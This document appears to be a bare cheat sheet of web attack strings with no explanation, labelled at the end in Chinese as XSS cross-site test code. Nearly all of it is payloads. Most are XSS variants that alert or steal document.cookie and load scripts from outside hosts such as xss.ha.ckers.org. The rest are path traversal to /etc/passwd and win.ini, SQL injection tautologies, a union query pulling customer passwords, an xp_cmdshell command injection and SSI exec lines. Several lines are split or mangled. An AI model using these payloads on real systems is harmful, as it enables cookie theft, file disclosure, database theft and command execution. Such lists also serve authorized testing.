'><script>alert(document.cookie)</script>
='
><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert(
'XSS'
)%3C/script%3E
<script>alert(
'XSS'
)</script>
<img src=
"javascript:alert('XSS')"
>
%0a%0a<script>alert(\
"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"
><script>alert(
'Vulnerable'
)</script>
';exec%20master..xp_cmdshell%20'
dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt
'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'
';!--"<XSS>=&{()}
<IMG src="javascript:alert('
XSS
');">
<IMG src=javascript:alert('
XSS
')>
<IMG src=JaVaScRiPt:alert('
XSS
')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('
XSS
')>
<IMG src=javascript:alert('
XSS
')>
<IMG src=javascript:alert('XSS')>
<IMG src="jav ascript:alert('
XSS
');">
<IMG src="jav ascript:alert('
XSS
');">
<IMG src="jav ascript:alert('
XSS
');">
"<IMG src=java\0script:alert(\"XSS\")>";'
> out
<IMG src=
" javascript:alert('XSS');"
>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND=
"javascript:alert('XSS')"
>
<BODY ONLOAD=alert(
'XSS'
)>
<IMG DYNSRC=
"javascript:alert('XSS')"
>
<IMG LOWSRC=
"javascript:alert('XSS')"
>
<BGSOUND src=
"javascript:alert('XSS');"
>
<br size=
"&{alert('XSS')}"
>
<LAYER src=
"http://xss.ha.ckers.org/a.js"
></layer>
<LINK REL=
"stylesheet"
href=
"javascript:alert('XSS');"
>
<IMG src=
'vbscript:msgbox("XSS")'
>
<IMG src=
"mocha:[code]"
>
<IMG src=
"livescript:[code]"
>
<META HTTP-EQUIV=
"refresh"
CONTENT=
"0;url=javascript:alert('XSS');"
>
<IFRAME src=javascript:alert(
'XSS'
)></IFRAME>
<FRAMESET><FRAME src=javascript:alert(
'XSS'
)></FRAME></FRAMESET>
<TABLE BACKGROUND=
"javascript:alert('XSS')"
>
<DIV STYLE=
"background-image: url(javascript:alert('XSS'))"
>
<DIV STYLE=
"behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<DIV STYLE=
"width: expression(alert('XSS'));"
>
<STYLE>@im\port
'\ja\vasc\ript:alert("XSS")'
;</STYLE>
<IMG STYLE=
'xss:expre\ssion(alert("XSS"))'
>
<STYLE TYPE=
"text/javascript"
>alert(
'XSS'
);</STYLE>
<STYLE TYPE=
"text/css"
>.XSS{background-image:url(
"javascript:alert('XSS')"
);}</STYLE><A
class
=
"XSS"
></A>
<STYLE type=
"text/css"
>BODY{background:url(
"javascript:alert('XSS')"
)}</STYLE>
<BASE href=
"javascript:alert('XSS');//"
>
getURL(
"javascript:alert('XSS')"
)
a=
"get"
;b=
"URL"
;c=
"javascript:"
;d=
"alert('XSS');"
;eval(a+b+c+d);
<XML src=
"javascript:alert('XSS');"
>
"> <BODY ONLOAD="
a();
"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT src=
"http://xss.ha.ckers.org/xss.jpg"
></SCRIPT>
<IMG src=
"javascript:alert('XSS')"
<!--
#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<IMG src=
"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<SCRIPT a=
">"
src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<SCRIPT =
">"
src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<SCRIPT a=
">"
''
src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<SCRIPT
"a='>'"
src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<SCRIPT>document.write(
"<SCRI"
);</SCRIPT>PT src=
"http://xss.ha.ckers.org/a.js"
></SCRIPT>
<A href=http:
//www.gohttp://www.google.com/ogle.com/>link</A>
admin
'--
'
or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
"
or 0=0
#
or 0=0
#
' or
'x'
=
'x
" or "x"="x
'
) or (
'x'
=
'x
'
or 1=1--
" or 1=1--
or 1=1--
' or a=a--
"
or
"a"
=
"a
') or ('a'='a
"
) or (
"a"
=
"a
hi"
or
"a"
=
"a
hi"
or 1=1 --
hi' or 1=1 --
hi
' or '
a
'='
a
hi
') or ('
a
'='
a
hi
") or ("
a
"="
a
XSS跨站测试代码